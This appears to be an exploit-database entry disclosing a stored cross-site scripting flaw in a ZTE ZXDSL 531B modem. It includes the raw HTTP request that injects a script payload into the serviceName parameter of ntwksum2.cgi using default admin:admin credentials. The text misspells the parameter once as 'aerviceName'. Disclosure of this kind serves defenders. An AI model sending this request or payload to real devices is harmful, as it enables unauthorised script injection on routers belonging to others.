header-logo
Suggest Exploit
vendor:
ZXV10 W300
by:
Ravi Rajput
8,8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: ZXV10 W300
Affected Version From: ZXDSL 531BIIV7.3.0f_D09_IN
Affected Version To: ZXDSL 531BIIV7.3.0f_D09_IN
Patch Exists: N/A
Related CWE: N/A
CPE: h:zte:zxv10_w300
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2014

ZTE Modem Stored XSS Vulnerability

A stored XSS vulnerability exists in ZTE Modem, where the variable aerviceName can be set to a malicious payload <script>alert(0)</script> which can be used to execute arbitrary JavaScript code in the context of the user's browser.

Mitigation:

Input validation should be used to prevent malicious payloads from being injected into the application.
Source

Exploit-DB raw data:

# Exploit Title: ZTE Modem Stored XSS Vulnerability
# Date: 30-10-2014
# Exploit Author: Ravi Rajput aka Gr3y n00b IHT team
# Version: ZXDSL 531BIIV7.3.0f_D09_IN
# Software Link:http://wwwen.zte.com.cn
#Tested on : Windows 7
# code :

GET /ntwksum2.cgi?ntwkPrtcl=3&enblService=1&serviceName=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/enblbridge.html
Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657373223a302c226c6f675f616374697665223a307d
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive

Attack details :
The variable aerviceName  has been set to simple payload <script>alert(0)</script>